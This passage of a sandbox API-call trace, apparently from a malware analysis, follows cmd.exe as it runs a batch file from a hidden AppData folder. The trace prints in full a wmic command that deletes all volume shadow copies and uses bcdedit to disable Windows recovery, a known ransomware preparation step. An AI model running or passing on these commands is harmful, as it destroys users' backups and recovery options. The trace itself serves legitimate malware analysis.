_ArgList=0x28f6fc | out: _Buffer=" CiOHhXJTCFVtKQz1Zuv ") returned 21 [0117.533] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.533] GetFileType (hFile=0x7) returned 0x2 [0117.533] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0117.533] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6bc | out: lpMode=0x28f6bc) returned 1 [0117.533] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.533] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x28f6e8, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f6e8*=0x15) returned 1 [0117.533] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f71c | out: _Buffer="\r\n") returned 2 [0117.533] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.533] GetFileType (hFile=0x7) returned 0x2 [0117.533] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0117.533] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6dc | out: lpMode=0x28f6dc) returned 1 [0117.534] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.534] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f708, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f708*=0x2) returned 1 [0117.534] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0117.534] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0117.534] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0117.534] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0117.534] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0117.534] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0117.534] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0117.534] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0117.534] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0117.534] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0117.534] GetConsoleTitleW (in: lpConsoleTitle=0x28f28c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0117.534] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0117.534] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0117.534] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0117.534] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0117.535] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0117.535] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0117.535] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0117.535] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0117.535] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0117.535] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0117.535] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x28f254 | out: _Buffer="CiOHhXJTCFVtKQz1Zuv\r\n") returned 21 [0117.535] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.535] GetFileType (hFile=0x7) returned 0x2 [0117.535] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0117.535] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f214 | out: lpMode=0x28f214) returned 1 [0117.535] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.535] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x28f240, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f240*=0x15) returned 1 [0117.535] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.535] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0117.536] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.536] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0117.536] _get_osfhandle (_FileHandle=0) returned 0x3 [0117.536] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0117.536] SetConsoleInputExeNameW () returned 0x1 [0117.536] GetConsoleOutputCP () returned 0x1b5 [0117.536] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0117.536] SetThreadUILanguage (LangId=0x0) returned 0x409 [0117.536] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\kgixh98v.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f6c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0117.536] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0117.536] _get_osfhandle (_FileHandle=3) returned 0x58 [0117.536] SetFilePointer (in: hFile=0x58, lDistanceToMove=26, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1a [0117.537] _get_osfhandle (_FileHandle=3) returned 0x58 [0117.537] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a [0117.537] ReadFile (in: hFile=0x58, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f6a8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x28f6a8*=0x222, lpOverlapped=0x0) returned 1 [0117.537] SetFilePointer (in: hFile=0x58, lDistanceToMove=48, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x30 [0117.537] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=22, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="ping -n 30 localhost\r\nuv\r\n") returned 22 [0117.537] _get_osfhandle (_FileHandle=3) returned 0x58 [0117.537] GetFileType (hFile=0x58) returned 0x1 [0117.537] _get_osfhandle (_FileHandle=3) returned 0x58 [0117.537] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x30 [0117.538] _tell (_FileHandle=3) returned 48 [0117.538] _close (_FileHandle=3) returned 0 [0117.538] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f47c | out: _Buffer="\r\n") returned 2 [0117.538] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.538] GetFileType (hFile=0x7) returned 0x2 [0117.538] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0117.538] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f43c | out: lpMode=0x28f43c) returned 1 [0117.538] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.538] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f468, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f468*=0x2) returned 1 [0117.538] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0117.538] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x28f478 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0117.538] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x28f478 | out: _Buffer=">") returned 1 [0117.538] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.538] GetFileType (hFile=0x7) returned 0x2 [0117.539] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0117.539] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f440 | out: lpMode=0x28f440) returned 1 [0117.539] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.539] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x28f46c, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x28f46c*=0x19) returned 1 [0117.539] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.539] GetFileType (hFile=0x7) returned 0x2 [0117.539] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0117.539] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6c4 | out: lpMode=0x28f6c4) returned 1 [0117.539] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.539] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x490958*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x28f6f0, lpReserved=0x0 | out: lpBuffer=0x490958*, lpNumberOfCharsWritten=0x28f6f0*=0x4) returned 1 [0117.539] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x28f6fc | out: _Buffer=" -n 30 localhost ") returned 17 [0117.539] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.539] GetFileType (hFile=0x7) returned 0x2 [0117.540] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0117.540] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6bc | out: lpMode=0x28f6bc) returned 1 [0117.540] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.540] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x11, lpNumberOfCharsWritten=0x28f6e8, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f6e8*=0x11) returned 1 [0117.540] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f71c | out: _Buffer="\r\n") returned 2 [0117.540] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.540] GetFileType (hFile=0x7) returned 0x2 [0117.540] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0117.540] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6dc | out: lpMode=0x28f6dc) returned 1 [0117.540] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.540] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f708, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f708*=0x2) returned 1 [0117.540] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0117.540] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0117.540] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0117.540] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0117.541] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0117.541] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0117.541] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0117.541] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0117.541] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0117.541] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0117.541] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0117.541] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0117.541] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0117.541] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0117.541] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0117.541] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0117.541] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0117.541] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0117.541] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0117.541] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0117.541] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0117.541] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0117.541] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0117.541] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0117.541] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0117.541] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0117.541] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0117.541] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0117.541] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0117.541] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0117.541] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0117.541] _wcsicmp (_String1="ping", _String2="START") returned -3 [0117.541] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0117.541] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0117.541] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0117.541] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0117.541] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0117.541] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0117.541] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0117.541] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0117.541] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0117.541] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0117.541] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0117.541] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0117.542] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0117.542] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x28f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f23c) returned 0xffffffff [0117.542] GetLastError () returned 0x2 [0117.542] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x28f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f23c) returned 0xffffffff [0117.542] GetLastError () returned 0x2 [0117.542] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x28f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f23c) returned 0x4a0870 [0117.542] FindClose (in: hFindFile=0x4a0870 | out: hFindFile=0x4a0870) returned 1 [0117.542] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x28f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f23c) returned 0xffffffff [0117.542] GetLastError () returned 0x2 [0117.542] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x28f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f23c) returned 0x4a0870 [0117.543] FindClose (in: hFindFile=0x4a0870 | out: hFindFile=0x4a0870) returned 1 [0117.543] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0117.543] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0117.543] GetConsoleTitleW (in: lpConsoleTitle=0x28f28c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0117.543] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0117.543] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0117.543] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0117.543] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x28eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb28) returned 0xffffffff [0117.543] GetLastError () returned 0x2 [0117.543] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x28eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb28) returned 0xffffffff [0117.543] GetLastError () returned 0x2 [0117.543] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x28eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb28) returned 0x4a0db8 [0117.543] FindClose (in: hFindFile=0x4a0db8 | out: hFindFile=0x4a0db8) returned 1 [0117.544] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x28eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb28) returned 0xffffffff [0117.544] GetLastError () returned 0x2 [0117.544] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x28eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb28) returned 0x4a0db8 [0117.544] FindClose (in: hFindFile=0x4a0db8 | out: hFindFile=0x4a0db8) returned 1 [0117.544] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0117.544] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0117.544] GetConsoleTitleW (in: lpConsoleTitle=0x28f020, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0117.544] InitializeProcThreadAttributeList (in: lpAttributeList=0x28eea8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28ef70 | out: lpAttributeList=0x28eea8, lpSize=0x28ef70) returned 1 [0117.544] UpdateProcThreadAttribute (in: lpAttributeList=0x28eea8, dwFlags=0x0, Attribute=0x60001, lpValue=0x28ef68, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28eea8, lpPreviousValue=0x0) returned 1 [0117.544] GetStartupInfoW (in: lpStartupInfo=0x28ee64 | out: lpStartupInfo=0x28ee64*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0117.544] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0117.545] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 30 localhost", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x28ef04*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 30 localhost", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28ef50 | out: lpCommandLine="ping -n 30 localhost", lpProcessInformation=0x28ef50*(hProcess=0x54, hThread=0x58, dwProcessId=0xed0, dwThreadId=0xed4)) returned 1 [0117.698] CloseHandle (hObject=0x58) returned 1 [0117.698] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0117.698] GetEnvironmentStringsW () returned 0x490970* [0117.698] FreeEnvironmentStringsW (penv=0x490970) returned 1 [0117.698] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0159.089] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x28ee44 | out: lpExitCode=0x28ee44*=0x0) returned 1 [0159.089] CloseHandle (hObject=0x54) returned 1 [0159.089] _vsnwprintf (in: _Buffer=0x28ef8c, _BufferCount=0x13, _Format="%08X", _ArgList=0x28ee50 | out: _Buffer="00000000") returned 8 [0159.089] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0159.089] GetEnvironmentStringsW () returned 0x492c28* [0159.090] FreeEnvironmentStringsW (penv=0x492c28) returned 1 [0159.090] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0159.090] GetEnvironmentStringsW () returned 0x492c28* [0159.090] FreeEnvironmentStringsW (penv=0x492c28) returned 1 [0159.090] DeleteProcThreadAttributeList (in: lpAttributeList=0x28eea8 | out: lpAttributeList=0x28eea8) [0159.090] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.090] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0159.090] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.090] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0159.090] _get_osfhandle (_FileHandle=0) returned 0x3 [0159.090] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0159.090] SetConsoleInputExeNameW () returned 0x1 [0159.090] GetConsoleOutputCP () returned 0x1b5 [0159.090] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0159.090] SetThreadUILanguage (LangId=0x0) returned 0x409 [0159.091] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\kgixh98v.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f6c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0159.091] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0159.091] _get_osfhandle (_FileHandle=3) returned 0x54 [0159.091] SetFilePointer (in: hFile=0x54, lDistanceToMove=48, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x30 [0159.092] _get_osfhandle (_FileHandle=3) returned 0x54 [0159.092] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x30 [0159.092] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f6a8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x28f6a8*=0x20c, lpOverlapped=0x0) returned 1 [0159.093] SetFilePointer (in: hFile=0x54, lDistanceToMove=243, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf3 [0159.093] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=195, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="wmic.exe process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\n") returned 195 [0159.093] _get_osfhandle (_FileHandle=3) returned 0x54 [0159.093] GetFileType (hFile=0x54) returned 0x1 [0159.093] _get_osfhandle (_FileHandle=3) returned 0x54 [0159.093] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf3 [0159.096] _tell (_FileHandle=3) returned 243 [0159.096] _close (_FileHandle=3) returned 0 [0159.096] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f47c | out: _Buffer="\r\n") returned 2 [0159.096] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.096] GetFileType (hFile=0x7) returned 0x2 [0159.097] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0159.097] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f43c | out: lpMode=0x28f43c) returned 1 [0159.097] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.097] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f468, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f468*=0x2) returned 1 [0159.097] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0159.097] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0159.097] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x28f478 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0159.097] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x28f478 | out: _Buffer=">") returned 1 [0159.097] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.098] GetFileType (hFile=0x7) returned 0x2 [0159.098] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0159.098] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f440 | out: lpMode=0x28f440) returned 1 [0159.098] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.098] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x28f46c, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x28f46c*=0x19) returned 1 [0159.098] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.098] GetFileType (hFile=0x7) returned 0x2 [0159.098] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0159.098] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6c4 | out: lpMode=0x28f6c4) returned 1 [0159.098] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.098] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x48eb68*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x28f6f0, lpReserved=0x0 | out: lpBuffer=0x48eb68*, lpNumberOfCharsWritten=0x28f6f0*=0x8) returned 1 [0159.099] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x28f6fc | out: _Buffer=" process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\" ") returned 186 [0159.099] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.099] GetFileType (hFile=0x7) returned 0x2 [0159.099] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0159.099] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6bc | out: lpMode=0x28f6bc) returned 1 [0159.099] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.099] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, 